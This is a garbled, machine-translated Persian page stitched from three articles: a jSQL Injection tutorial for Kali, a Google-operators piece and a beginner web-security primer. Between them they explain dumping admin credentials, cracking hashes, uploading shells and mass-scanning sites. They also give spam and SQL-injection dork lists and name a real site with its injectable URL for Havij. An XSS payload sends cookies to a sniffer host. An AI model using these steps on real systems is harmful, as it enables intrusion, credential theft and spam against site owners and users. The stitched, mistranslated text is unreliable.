دستورالعمل استفاده از jSQL Injection، یک ابزار چند منظوره برای جستجو و بهره برداری از تزریق SQL در کالی لینوکس. دستورالعمل استفاده از jSQL Injection - یک ابزار چند منظوره برای جستجو و بهره برداری از تزریق SQL در کالی لینوکس

صفحه اصلی / منجمد می شود

فایل دانلود شده را با دوبار کلیک کردن اجرا کنید (شما باید داشته باشید ماشین مجازی ).

3. ناشناس بودن هنگام بررسی یک سایت برای تزریق SQL
راه اندازی Torو Privoxy در کالی لینوکس

[بخش در حال توسعه]

راه اندازی Tor و Privoxy در ویندوز

[بخش در حال توسعه]

تنظیمات پروکسی در تزریق jSQL

[بخش در حال توسعه]

4. بررسی سایت برای تزریق SQL با تزریق jSQL

کار با برنامه فوق العاده ساده است. فقط آدرس وب سایت را وارد کرده و ENTER را فشار دهید.

تصویر زیر نشان می دهد که سایت در برابر سه نوع تزریق SQL آسیب پذیر است (اطلاعات مربوط به آنها در گوشه سمت راست پایین نشان داده شده است). با کلیک بر روی نام تزریق ها می توانید روش مورد استفاده را تغییر دهید:

همچنین پایگاه های داده موجود قبلا به ما نمایش داده شده است.

می توانید محتویات هر جدول را مشاهده کنید:

به طور معمول، جالب ترین چیز در مورد جداول، اعتبار مدیر است.

اگر خوش شانس هستید و داده های مدیر را پیدا کردید، برای خوشحالی خیلی زود است. هنوز باید پنل مدیریت را پیدا کنید که در آن این داده ها را وارد کنید.

5. پنل های مدیریت را با تزریق jSQL جستجو کنید

برای این کار به تب بعدی بروید. در اینجا با لیستی از آدرس های احتمالی مواجه می شویم. می توانید یک یا چند صفحه را برای بررسی انتخاب کنید:

راحتی در این واقعیت نهفته است که شما نیازی به استفاده از برنامه های دیگر ندارید.

متأسفانه، برنامه نویسان بی دقت زیادی وجود ندارند که رمزهای عبور را در متن واضح ذخیره می کنند. اغلب در خط رمز عبور چیزی شبیه به آن را می بینیم

8743b52063cd84097a65d1633f5c74f5

این یک هش است. شما می توانید آن را با استفاده از نیروی بی رحم رمزگشایی کنید. و... jSQL Injection دارای بروت فورس داخلی است.

6. هش‌های Brute Force با استفاده از jSQL Injection

راحتی بدون شک این است که شما نیازی به جستجوی برنامه های دیگر ندارید. پشتیبانی از بسیاری از محبوب ترین هش ها وجود دارد.

این بیشتر نیست بهترین گزینه. برای تبدیل شدن به یک گورو در رمزگشایی هش، کتاب "" به زبان روسی توصیه می شود.

اما، البته، زمانی که برنامه دیگری در دسترس نیست یا زمانی برای مطالعه وجود ندارد، jSQL Injection با عملکرد brute force داخلی آن بسیار مفید خواهد بود.

تنظیماتی وجود دارد: می توانید تعیین کنید کدام کاراکترها در رمز عبور گنجانده شده است، محدوده طول رمز عبور.

7. عملیات فایل پس از تشخیص تزریق SQL

علاوه بر عملیات با پایگاه داده - خواندن و اصلاح آنها، در صورت شناسایی تزریق SQL، عملیات فایل زیر را می توان انجام داد:

  • خواندن فایل ها روی سرور
  • آپلود فایل های جدید روی سرور
  • آپلود پوسته ها روی سرور

و همه اینها در jSQL Injection پیاده سازی شده است!

محدودیت هایی وجود دارد - سرور SQL باید دارای امتیازات فایل باشد. معقول ها مدیران سیستمآنها غیر فعال هستند و به آنها دسترسی دارند فایل سیستمقادر به دریافت آن نخواهد بود.

بررسی وجود امتیازات فایل بسیار ساده است. به یکی از تب ها (خواندن فایل ها، ایجاد پوسته، آپلود فایل جدید) بروید و سعی کنید یکی از عملیات مشخص شده را انجام دهید.

هنوز خیلی نکته مهم- ما باید مسیر مطلق دقیق فایلی که با آن کار خواهیم کرد را بدانیم - در غیر این صورت هیچ چیز کار نخواهد کرد.

به اسکرین شات زیر نگاه کنید:

به هر تلاشی برای کار بر روی یک فایل، به ما پاسخ داده می شود: بدون امتیاز FILE (بدون امتیاز فایل). و در اینجا هیچ کاری نمی توان کرد.

اگر در عوض خطای دیگری دارید:

مشکل در نوشتن در [directory_name]

این بدان معناست که شما مسیر مطلقی را که می خواهید فایل را در آن بنویسید به اشتباه مشخص کرده اید.

برای حدس زدن یک مسیر مطلق، حداقل باید بدانید سیستم عاملکه سرور روی آن اجرا می شود. برای انجام این کار، به تب Network بروید.

این مدخل (خط Win64) به ما دلیلی می دهد که فرض کنیم با سیستم عامل ویندوز سروکار داریم:

Keep-Alive: timeout=5, max=99 سرور: Apache/2.4.17 (Win64) PHP/7.0.0RC6 اتصال: Keep-Alive روش: HTTP/1.1 200 OK Content-Length: 353 تاریخ: جمعه، 115 دسامبر 11:48:31 GMT X-Powered-By: PHP/7.0.0RC6 نوع محتوا: text/html; charset=UTF-8

در اینجا تعدادی یونیکس (*BSD، Linux) داریم:

Transfer-Encoding: chunked تاریخ: جمعه، 11 دسامبر 2015، 11:57:02 GMT روش: HTTP/1.1 200 OK Keep-Alive: timeout=3، max=100 اتصال: keep-alive نوع محتوا: text/html X- پشتیبانی شده توسط: PHP/5.3.29 سرور: Apache/2.2.31 (یونیکس)

و در اینجا ما CentOS را داریم:

روش: HTTP/1.1 200 OK منقضی می‌شود: پنج‌شنبه، 19 نوامبر 1981، 08:52:00 GMT Set-Cookie: PHPSESSID=9p60gtunrv7g41iurr814h9rd0; path=/ اتصال: keep-alive X-Cache-Lookup: MISS از t1.hoster.ru:6666 سرور: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.4.37 X-Cache: MISS از t1.hoster.ru Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 پراگما: بدون کش تاریخ: جمعه, 11 دسامبر 2015 12:08:54 GMT انتقال-کدگذاری: تکه تکه شده نوع محتوا: متن/html. charset=WINDOWS-1251

در ویندوز، یک پوشه معمولی برای سایت ها C:\Server\data\htdocs\ . اما، در واقع، اگر کسی "به فکر" ساخت سرور در ویندوز افتاده باشد، به احتمال زیاد، این شخص چیزی در مورد امتیازات نشنیده است. بنابراین، باید مستقیماً از دایرکتوری C:/Windows/ شروع به امتحان کنید:

همانطور که می بینید، بار اول همه چیز خوب پیش رفت.

اما خود پوسته های تزریق jSQL تردیدهایی را در ذهن من ایجاد می کند. اگر امتیاز فایل دارید، می توانید به راحتی چیزی را با یک رابط وب آپلود کنید.

8. بررسی انبوه سایت ها برای تزریق SQL

و حتی این تابع در jSQL Injection نیز موجود است. همه چیز بسیار ساده است - لیستی از سایت ها را دانلود کنید (می توانید از یک فایل وارد کنید)، مواردی را که می خواهید بررسی کنید انتخاب کنید و برای شروع عملیات روی دکمه مناسب کلیک کنید.

نتیجه گیری از jSQL Injection

تزریق jSQL خوب است، ابزار قدرتمندبرای جستجو و متعاقبا استفاده از تزریق SQL موجود در وب سایت ها. مزایای بدون شک آن: سهولت استفاده، ساخته شده است توابع مرتبط. jSQL Injection می تواند بهترین دوست یک مبتدی در هنگام تجزیه و تحلیل وب سایت ها باشد.

در میان کاستی ها، من به عدم امکان ویرایش پایگاه داده ها اشاره می کنم (حداقل این قابلیت را پیدا نکردم). مثل همه سازها با رابط گرافیکی، یکی از معایب این برنامه را می توان عدم امکان استفاده از آن در اسکریپت ها دانست. با این وجود، برخی از اتوماسیون ها نیز در این برنامه امکان پذیر است - به لطف عملکرد داخلی بررسی انبوه سایت.

استفاده از برنامه jSQL Injection بسیار راحت تر از sqlmap است. اما sqlmap از انواع بیشتری از تزریق SQL پشتیبانی می کند، گزینه هایی برای کار با فایروال فایل ها و برخی عملکردهای دیگر دارد.

خط پایین: jSQL Injection - بهترین دوستهکر تازه کار

راهنمای این برنامه در دایره المعارف لینوکس کالی را می توانید در این صفحه پیدا کنید: http://kali.tools/?p=706

چگونه با استفاده از google.com به درستی جستجو کنیم

احتمالاً همه می دانند که چگونه از این استفاده کنند موتور جستجو، مانند گوگل =) اما همه نمی دانند که اگر آن را به درستی بنویسید پرس و جو جستجوبا کمک طرح های خاص، می توانید نتایج مورد نظر خود را بسیار کارآمدتر و سریع تر به دست آورید =) در این مقاله سعی خواهم کرد نشان دهم که برای جستجوی صحیح چه کاری و چگونه باید انجام دهید.

Google از چندین اپراتور جستجوی پیشرفته پشتیبانی می کند که هنگام جستجو در google.com معنای خاصی دارند. به طور معمول، این اپراتورها جستجو را تغییر می دهند یا حتی به گوگل می گویند این کار را به طور کامل انجام دهد انواع مختلفجستجو کنید. به عنوان مثال، link: construct یک عملگر ویژه است و درخواست لینک: www.google.comبه شما یک جستجوی معمولی نمی دهد، اما در عوض تمام صفحات وب را که پیوندهایی به google.com دارند پیدا می کند.
انواع درخواست جایگزین

حافظه پنهان: اگر کلمات دیگری را در یک پرس و جو قرار دهید، Google آن کلمات موجود در سند ذخیره شده را برجسته می کند.
به عنوان مثال، کش: www.webمحتوای ذخیره شده را با کلمه "وب" برجسته نشان می دهد.

پیوند: عبارت جستجوی بالا صفحات وبی را نشان می دهد که حاوی پیوندهایی به درخواست مشخص شده هستند.
به عنوان مثال: لینک: www.siteتمام صفحاتی که دارای پیوند به http://www.site هستند را نمایش می دهد

مرتبط: صفحات وب را که "مربوط" به صفحه وب مشخص شده هستند را نمایش می دهد.
به عنوان مثال، مرتبط: www.google.comصفحات وب مشابه را فهرست می کند صفحه اصلیگوگل.

اطلاعات: اطلاعات درخواستی: برخی از اطلاعاتی که گوگل در مورد صفحه وب درخواستی شما دارد را ارائه می دهد.
به عنوان مثال، اطلاعات: وب سایتاطلاعاتی در مورد انجمن ما نشان خواهد داد =) (Armada - Adult Webmasters Forum).

سایر درخواست های اطلاعاتی

define: پرس و جو define: تعریفی از کلماتی که بعد از آن وارد می کنید، از منابع مختلف آنلاین جمع آوری می کند. این تعریف برای کل عبارت وارد شده خواهد بود (یعنی شامل تمام کلمات در عبارت جستجوی دقیق می شود).

سهام: اگر یک پرس و جو را با سهام شروع کنید: Google بقیه شرایط پرس و جو را به عنوان نمادهای سهام پردازش می کند و به صفحه ای پیوند می دهد که اطلاعات آماده برای این نمادها را نشان می دهد.
به عنوان مثال، سهام: Intel yahooاطلاعاتی در مورد اینتل و یاهو نشان خواهد داد. (توجه داشته باشید که باید نمادهای اخبار فوری را تایپ کنید نه نام شرکت)

اصلاح کننده های پرس و جو

سایت: اگر سایت: را در جستجوی خود قرار دهید، گوگل نتایج را به وب سایت هایی که در آن دامنه پیدا می کند محدود می کند.
شما همچنین می توانید بر اساس مناطق جداگانه جستجو کنید، مانند ru، org، com، و غیره ( سایت: کام سایت:ru)

allintitle: اگر یک پرس و جو با allintitle: اجرا کنید، گوگل نتایج را به تمام کلمات جستجو در عنوان محدود می کند.
به عنوان مثال، allintitle: جستجوی گوگل تمام صفحات گوگل را با جستجو مانند تصاویر، وبلاگ و غیره برمی گرداند

intitle: اگر intitle: را در جستار خود قرار دهید، Google نتایج را به اسنادی که حاوی آن کلمه در عنوان هستند محدود می کند.
به عنوان مثال، عنوان: کسب و کار

allinurl: اگر یک پرس و جو را با allinurl اجرا کنید: Google نتایج را به تمام کلمات جستجو در URL محدود می کند.
به عنوان مثال، allinurl: جستجو در گوگلاسناد را با گوگل برمی گرداند و در عنوان جستجو می کند. همچنین، به عنوان یک گزینه، می توانید کلمات را با علامت (/) جدا کنید، سپس کلمات دو طرف اسلش در همان صفحه جستجو می شوند: مثال allinurl: foo/bar

inurl: اگر inurl: را در جستجوی خود قرار دهید، Google نتایج را به اسنادی که حاوی آن کلمه در URL هستند محدود می کند.
به عنوان مثال، انیمیشن inurl:site

intext: فقط کلمه مشخص شده را در متن صفحه جستجو می کند، بدون توجه به عنوان و متن های پیوند، و موارد دیگر که به آن مربوط نیستند نیز مشتقی از این اصلاح کننده وجود دارد - allintext: i.e. علاوه بر این، تمام کلمات موجود در پرس و جو فقط در متن جستجو می شوند، که می تواند مهم باشد و کلمات پرکاربرد در پیوندها را نادیده بگیرد.
به عنوان مثال، intext: انجمن

daterange: جستجوها در یک چارچوب زمانی (daterange:2452389-2452389)، تاریخ‌ها برای زمان‌ها در قالب جولیان هستند.

خوب، و انواع و اقسام نمونه های جالب از پرس و جوها

نمونه هایی از نوشتن پرس و جو برای گوگل. برای اسپمرها

Inurl:control.guest?a=sign

Site:books.dreambook.com "URL صفحه اصلی" "Sign my" inurl:sign

سایت: www.freegb.net صفحه اصلی

Inurl:sign.asp «تعداد کاراکترها»

"پیام:" inurl:sign.cfm "فرستنده:"

Inurl:register.php "ثبت کاربر" "وب سایت"

Inurl:edu/کتاب مهمان «کتاب مهمان را امضا کنید»

Inurl: ارسال "پست نظر" "URL"

Inurl:/archives/ "Comments:" "اطلاعات را به خاطر دارید؟"

«اسکریپت و کتاب مهمان ایجاد شده توسط:» «URL:» «نظرات:»

Inurl:?action=add "phpBook" "URL"

عنوان: "ارسال داستان جدید"

مجلات

Inurl:www.livejournal.com/users/ mode=reply

Inurl greatestjournal.com/ mode=reply

Inurl:fastbb.ru/re.pl؟

Inurl:fastbb.ru /re.pl؟ "کتاب مهمان"

وبلاگ ها

Inurl:blogger.com/comment.g?”postID””ناشناس”

Inurl:typepad.com/ "یک نظر ارسال کنید" "اطلاعات شخصی را به خاطر دارید؟"

Inurl:greatestjournal.com/community/ " ارسال نظر" "آدرس پوسترهای ناشناس"

"پست نظر" "آدرس پوسترهای ناشناس" -

عنوان: ارسال نظر

Inurl:pirillo.com "ارسال نظر"

انجمن ها

Inurl:gate.html?”name=Forums” “mode=reply”

Inurl:”forum/posting.php?mode=reply”

Inurl:"mes.php?"

Inurl:”members.html”

Inurl:forum/memberlist.php؟”

و بنابراین، اکنون به شما می گویم که چگونه بدون دانش خاصی چیزی را هک کنید. من فوراً می گویم که سود کمی از این وجود دارد، اما هنوز.
ابتدا باید خود سایت ها را پیدا کنید. برای انجام این کار، به google.com بروید و dorks را جستجو کنید

Inurl:pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php? id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurl:Stray- Questions-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl: news.php?id= inurl:avd_start.php?avd= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl: select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:ogl_inet.php?ogl_id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id= inurl:sem. php3?id= inurl:kategorie.php4?id= inurl:news.php?id= inurl:index.php?id= inurl:faq2.php?id= inurl:show_an.php?id= inurl:preview.php? id= inurl:loadpsb.php?id= inurl:opinions.php?id= inurl:spr.php?id= inurl:pages.php?id= inurl:announce.php?id= inurl:clanek.php4?id= inurl:participant.php?id= inurl:download.php?id= inurl:main.php?id= inurl:review.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl: prod_detail.php?id= inurl:viewphoto.php?id= inurl:article.php?id= inurl:person.php?id= inurl:productinfo.php?id= inurl:showimg.php?id= inurl:view. php?id= inurl:website.php?id= inurl:hosting_info.php?id= inurl:gallery.php?id= inurl:rub.php?idr= inurl:view_faq.php?id= inurl:artikelinfo.php? id= inurl:detail.php?ID= inurl:index.php?= inurl:profile_view.php?id= inurl:category.php?id= inurl:publications.php?id= inurl:fellows.php?id= inurl :downloads_info.php?id= inurl:prod_info.php?id= inurl:shop.php?do=part&id= inurl:productinfo.php?id= inurl:collectionitem.php?id= inurl:band_info.php?id= inurl :product.php?id= inurl:releases.php?id= inurl:ray.php?id= inurl:produit.php?id= inurl:pop.php?id= inurl:shopping.php?id= inurl:productdetail .php?id= inurl:post.php?id= inurl:viewshowdetail.php?id= inurl:clubpage.php?id= inurl:memberInfo.php?id= inurl:section.php?id= inurl:theme.php ?id= inurl:page.php?id= inurl:shredder-categories.php?id= inurl:tradeCategory.php?id= inurl:product_ranges_view.php?ID= inurl:shop_category.php?id= inurl:transcript.php ?id= inurl:channel_id= inurl:item_id= inurl:newsid= inurl:trainers.php?id= inurl:news-full.php?id= inurl:news_display.php?getid= inurl:index2.php?option= inurl :readnews.php?id= inurl:top10.php?cat= inurl:newsone.php?id= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl :aboutbook.php?id= inurl:preview.php?id= inurl:loadpsb.php?id= inurl:pages.php?id= inurl:material.php?id= inurl:clanek.php4?id= inurl: اعلام .php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:viewapp.php?id= inurl:viewphoto.php?id= inurl:rub.php?idr= inurl:galeri_info.php ?l= inurl:review.php?id= inurl:iniziativa.php?in= inurl:curriculum.php?id= inurl:labels.php?id= inurl:story.php?id= inurl:look.php? ID= inurl:newsone.php?id= inurl:aboutbook.php?id= inurl:material.php?id= inurl:opinions.php?id= inurl:announce.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:tekst.php?idt= inurl:newscat.php?id= inurl:newsticker_info.php?idn= inurl:rubrika.php?idr= inurl:rubp.php?idr= inurl: offer.php?idf= inurl:art.php?idm= inurl:title.php?id= inurl:".php?id=1" inurl:".php?cat=1" inurl:".php?catid= 1" inurl:".php?num=1" inurl:".php?bid=1" inurl:".php?pid=1" inurl:".php?nid=1"

در اینجا یک لیست کوچک است. میتونی از مال خودت استفاده کنی و بنابراین، ما سایت را پیدا کردیم. به عنوان مثال http://www.vestitambov.ru/
در ادامه این برنامه را دانلود کنید

**محتوای پنهان: برای دیدن این محتوای پنهان، تعداد پست شما باید 3 یا بیشتر باشد.**

روی OK کلیک کنید. سپس سایت قربانی را درج می کنیم.
شروع را فشار می دهیم. در ادامه منتظر نتایج هستیم.
و بنابراین، برنامه یک آسیب پذیری SQL پیدا کرد.

در ادامه Havij را دانلود کنید http://www.vestitambov.ru:80/index.php?module=group_programs&id_gp= لینک دریافتی را در آنجا قرار دهید. من توضیح نمی دهم که چگونه از Havij استفاده کنید و پیدا کردن آن دشوار نیست. همه شما داده‌های مورد نیاز خود را دریافت کرده‌اید - رمز عبور سرپرست، و سپس این به تصور شما بستگی دارد.

P.S. این اولین تلاش من برای نوشتن چیزی است. ببخشید اگر چیزی اشتباه است

تصمیم گرفتم کمی در موردش صحبت کنم امنیت اطلاعات. این مقاله برای برنامه نویسان تازه کار و کسانی که به تازگی شروع به توسعه Frontend کرده اند مفید خواهد بود. مشکل چیست؟

بسیاری از توسعه دهندگان مبتدی به قدری از نوشتن کد غافلگیر می شوند که امنیت کار خود را کاملاً فراموش می کنند. و مهمتر از همه، آنها آسیب پذیری هایی مانند پرس و جوهای SQL و XXS را فراموش می کنند. آنها همچنین رمزهای عبور آسانی را برای پنل های اداری خود ارائه می دهند و در معرض زور وحشیانه قرار می گیرند. این حملات چیست و چگونه می توان از آنها جلوگیری کرد؟

تزریق SQL

تزریق SQL رایج ترین نوع حمله به پایگاه داده است که در طی یک پرس و جوی SQL برای یک DBMS خاص انجام می شود. بسیاری از مردم و حتی شرکت های بزرگ از چنین حملاتی رنج می برند. دلیل آن یک خطای توسعه دهنده هنگام نوشتن پایگاه داده و به عبارت دقیق تر، پرس و جوهای SQL است.

حمله تزریق SQL به دلیل پردازش نادرست داده های ورودی مورد استفاده در پرس و جوهای SQL امکان پذیر است. اگر حمله یک هکر موفقیت آمیز باشد، نه تنها محتویات پایگاه داده، بلکه رمزهای عبور و گزارش های پنل مدیریتی را نیز از دست خواهید داد. و این داده ها برای تصاحب کامل سایت یا انجام تنظیمات برگشت ناپذیر در آن کاملاً کافی خواهد بود.

این حمله را می توان با موفقیت در اسکریپت های نوشته شده در PHP، ASP، Perl و سایر زبان ها بازتولید کرد. موفقیت چنین حملاتی بیشتر به این بستگی دارد که از چه DBMS استفاده می شود و خود اسکریپت چگونه پیاده سازی می شود. سایت های آسیب پذیر زیادی برای تزریق SQL در دنیا وجود دارد. این به راحتی قابل تأیید است. فقط "dorks" را وارد کنید - اینها پرس و جوهای ویژه برای جستجوی سایت های آسیب پذیر هستند. در اینجا به برخی از آنها اشاره می کنیم:

  • inurl:index.php?id=
  • inurl:trainers.php?id=
  • inurl:buy.php?category=
  • inurl:article.php?ID=
  • inurl:play_old.php?id=
  • inurl:declaration_more.php?decl_id=
  • inurl:pageid=
  • inurl:games.php?id=
  • inurl:page.php?file=
  • inurl:newsDetail.php?id=
  • inurl:gallery.php?id=
  • inurl:article.php?id=

چگونه از آنها استفاده کنیم؟ فقط آنها را در موتور جستجوی Google یا Yandex وارد کنید. موتور جستجو نه تنها یک سایت آسیب پذیر، بلکه صفحه ای در مورد این آسیب پذیری در اختیار شما قرار می دهد. اما ما در اینجا متوقف نمی‌شویم و مطمئن می‌شویم که صفحه واقعاً آسیب‌پذیر است. برای این کار کافی است بعد از مقدار “id=1” قرار دهید. نقل قول تک"'". چیزی شبیه این:

  • inurl:games.php?id=1'

و سایت به ما یک خطا در مورد می دهد پرس و جوی SQL. هکر ما در مرحله بعد به چه چیزی نیاز دارد؟

و سپس او به همین پیوند به صفحه خطا نیاز دارد. سپس کار بر روی آسیب پذیری در اکثر موارد در توزیع "Kali linux" با ابزارهای آن برای این بخش انجام می شود: معرفی کد تزریق و انجام عملیات لازم. چگونه این اتفاق خواهد افتاد، نمی توانم به شما بگویم. اما می توانید اطلاعاتی در این مورد در اینترنت پیدا کنید.

حمله XSS

این نوع حمله انجام می شود کوکی ها. کاربران نیز به نوبه خود دوست دارند آنها را ذخیره کنند. چرا نه؟ ما بدون آنها چه می کنیم؟ از این گذشته، به لطف کوکی ها، ما مجبور نیستیم رمز عبور Vk.com یا Mail.ru را صد بار وارد کنیم. و تعداد کمی هستند که آنها را رد کنند. اما در اینترنت، اغلب برای هکرها یک قانون ظاهر می شود: ضریب راحتی مستقیماً با ضریب ناامنی متناسب است.

برای اجرای یک حمله XSS، هکر ما به دانش جاوا اسکریپت نیاز دارد. در نگاه اول، زبان بسیار ساده و بی ضرر است، زیرا به منابع کامپیوتری دسترسی ندارد. یک هکر فقط می تواند با جاوا اسکریپت در مرورگر کار کند، اما این کافی است. پس از همه، نکته اصلی این است که کد را وارد صفحه وب کنید.

من در مورد روند حمله با جزئیات صحبت نمی کنم. من فقط اصول و معنای چگونگی این اتفاق را به شما خواهم گفت.

یک هکر می تواند کد JS را به انجمن یا کتاب مهمان اضافه کند:

document.location.href ="http://192.168.1.7/sniff.php?test"

اسکریپت‌ها ما را به صفحه آلوده هدایت می‌کنند، جایی که کد اجرا می‌شود: خواه یک sniffer، نوعی ذخیره‌سازی یا یک سوء استفاده باشد که به نوعی کوکی‌های ما را از حافظه پنهان می‌دزدد.

چرا جاوا اسکریپت؟ زیرا جاوا اسکریپت در رسیدگی به درخواست های وب عالی است و به کوکی ها دسترسی دارد. اما اگر اسکریپت ما را به سایتی ببرد، کاربر به راحتی متوجه آن خواهد شد. در اینجا هکر از گزینه حیله گرتری استفاده می کند - او به سادگی کد را در تصویر وارد می کند.

Img=تصویر جدید();

Img.src=”http://192.168.1.7/sniff.php?”+document.cookie;

ما به سادگی یک تصویر ایجاد می کنیم و اسکریپت خود را به عنوان یک آدرس به آن اختصاص می دهیم.

چگونه از خود در برابر این همه محافظت کنید؟ این بسیار ساده است - روی پیوندهای مشکوک کلیک نکنید.

حملات DoS و DDos

DoS (از انگلیسی Denial of Service - انکار خدمات) - حمله هکریدر سیستم کامپیوتریتا او را به سمت شکست سوق دهد. این ایجاد شرایطی است که در آن کاربران با حسن نیت سیستم نتوانند به ارائه شده دسترسی داشته باشند منابع سیستم(سرورها)، یا این دسترسی مشکل است. اگر در شرایط اضطراری نرم افزار اطلاعات مهمی را تولید کند: به عنوان مثال، نسخه، قطعه، خرابی سیستم می تواند گامی به سوی تصاحب آن باشد. کد برنامهاما اغلب این یک معیار فشار اقتصادی است: از دست دادن یک سرویس ساده که درآمد ایجاد می کند. صورت‌حساب‌های ارائه‌دهنده یا اقداماتی برای جلوگیری از حمله به طور قابل‌توجهی به "هدف" در جیب ضربه می‌زند در حال حاضر، حملات DoS و DDoS محبوب‌ترین هستند، زیرا تقریباً به هر سیستمی اجازه می‌دهند بدون به جا گذاشتن شواهد قانونی قابل توجهی از کار بیفتند.

تفاوت بین حمله DoS و DDos چیست؟

DoS یک حمله است که به روشی هوشمندانه طراحی شده است. به عنوان مثال، اگر سرور صحت بسته های دریافتی را بررسی نکند، یک هکر می تواند درخواستی را ارائه دهد که پردازش آن برای همیشه طول می کشد و زمان پردازشگر کافی برای کار با سایر اتصالات وجود نخواهد داشت. بر این اساس، مشتریان از خدمات خودداری خواهند کرد. اما امکان اضافه بار یا غیرفعال کردن سایت های بزرگ شناخته شده از این طریق وجود نخواهد داشت. آنها مجهز به کانال های نسبتاً گسترده و سرورهای فوق العاده قدرتمند هستند که می توانند بدون هیچ مشکلی با چنین بار اضافی کنار بیایند.

DDoS در واقع همان حمله DoS است. اما اگر در DoS یک بسته درخواست وجود داشته باشد، در DDoS می تواند صدها یا بیشتر از آنها وجود داشته باشد. حتی سرورهای فوق قدرتمند نیز ممکن است نتوانند با چنین بار اضافی کنار بیایند. بگذارید یک مثال بزنم.

حمله DoS زمانی است که شما در حال مکالمه با شخصی هستید، اما یک فرد بد اخلاق می آید و با صدای بلند شروع به فریاد زدن می کند. صحبت کردن یا غیرممکن است یا بسیار سخت. راه حل: با امنیت تماس بگیرید، که آرام می شود و فرد را از محل خارج می کند. حملات DDoS زمانی اتفاق می‌افتد که هزاران نفر از این افراد بد اخلاق وارد شوند. در این صورت حراست نمی تواند همه را ببندد و ببرد.

DoS و DDoS از رایانه ها، به اصطلاح زامبی ها، انجام می شود. اینها رایانه های کاربرانی هستند که توسط هکرها هک شده اند و حتی گمان نمی کنند که دستگاه آنها در حمله به هر سروری شرکت می کند.

چگونه از خود در برابر این محافظت کنید؟ به طور کلی، به هیچ وجه. اما شما می توانید کار را برای یک هکر سخت تر کنید. برای انجام این کار باید انتخاب کنید هاست خوببا سرورهای قدرتمند

حمله Bruteforce

یک توسعه‌دهنده می‌تواند سیستم‌های حفاظت از حمله زیادی را ارائه کند، اسکریپت‌هایی که نوشته‌ایم را به طور کامل بررسی کند، سایت را برای آسیب‌پذیری‌ها بررسی کند و غیره. اما وقتی نوبت به آخرین مرحلهطرح بندی سایت، یعنی زمانی که او به سادگی رمز عبور را در پنل مدیریت قرار می دهد، ممکن است یک چیز را فراموش کند. رمز عبور!

اکیداً توصیه نمی شود که یک رمز عبور ساده تنظیم کنید. این می تواند 12345، 1114457، vasya111 و غیره باشد. توصیه نمی شود رمزهای عبور کمتر از 10-11 کاراکتر تنظیم کنید. در غیر این صورت، ممکن است در معرض رایج ترین و بدون عارضه ترین حمله قرار بگیرید - نیروی بی رحم.

Brute force یک حمله رمز عبور فرهنگ لغت با استفاده از آن است برنامه های ویژه. لغت نامه ها می توانند متفاوت باشند: لاتین، شمارش با اعداد، فرض کنید تا محدوده خاصی، ترکیبی (لاتین + اعداد)، و حتی دیکشنری هایی با کاراکترهای منحصر به فرد @#4$%&*~~`”” وجود دارد. و غیره

البته اجتناب از این نوع حمله به راحتی امکان پذیر است. حتی یک کپچا می تواند شما را نجات دهد. همچنین، اگر سایت شما بر روی CMS ساخته شده باشد، بسیاری از آنها این نوع حمله را شناسایی کرده و IP را مسدود می کنند. همیشه باید به یاد داشته باشید که هر چه تعداد کاراکترهای مختلف رمز عبور بیشتر باشد، حدس زدن آن سخت تر است.

هکرها چگونه کار می کنند؟ در بیشتر موارد، آنها یا مشکوک هستند یا بخشی از رمز عبور را از قبل می دانند. کاملاً منطقی است که فرض کنیم رمز عبور کاربر مطمئناً شامل 3 یا 5 کاراکتر نخواهد بود. چنین پسوردهایی منجر به هک مکرر می شوند. اصولاً هکرها محدوده ای از 5 تا 10 کاراکتر را انتخاب می کنند و چندین کاراکتر را که ممکن است از قبل بدانند اضافه می کنند. در مرحله بعد، رمزهای عبور با محدوده مورد نیاز ایجاد می شود. توزیع لینوکس کالی حتی برنامه هایی برای چنین مواردی دارد. و voila، حمله دیگر طولانی نخواهد بود، زیرا حجم فرهنگ لغت دیگر زیاد نیست. علاوه بر این، یک هکر می تواند از قدرت کارت گرافیک استفاده کند. برخی از آنها از سیستم CUDA پشتیبانی می کنند و سرعت جستجو تا 10 برابر افزایش می یابد. و اکنون می بینیم که حمله به این صورت است به روشی سادهکاملا واقعی اما این فقط وب سایت ها نیستند که در معرض زور وحشیانه قرار می گیرند.

توسعه دهندگان عزیز هرگز سیستم امنیت اطلاعات را فراموش نکنید، زیرا امروزه بسیاری از مردم از جمله ایالت ها از این نوع حملات رنج می برند. به هر حال، بزرگترین آسیب پذیری شخصی است که همیشه می تواند در جایی حواسش پرت شود یا چیزی را از دست بدهد. ما برنامه نویس هستیم، اما ماشین های برنامه ریزی شده نیستیم. همیشه مراقب باشید، زیرا از دست دادن اطلاعات می تواند عواقب جدی داشته باشد!

© 2024 ermake.ru -- درباره تعمیر رایانه شخصی - پورتال اطلاعاتی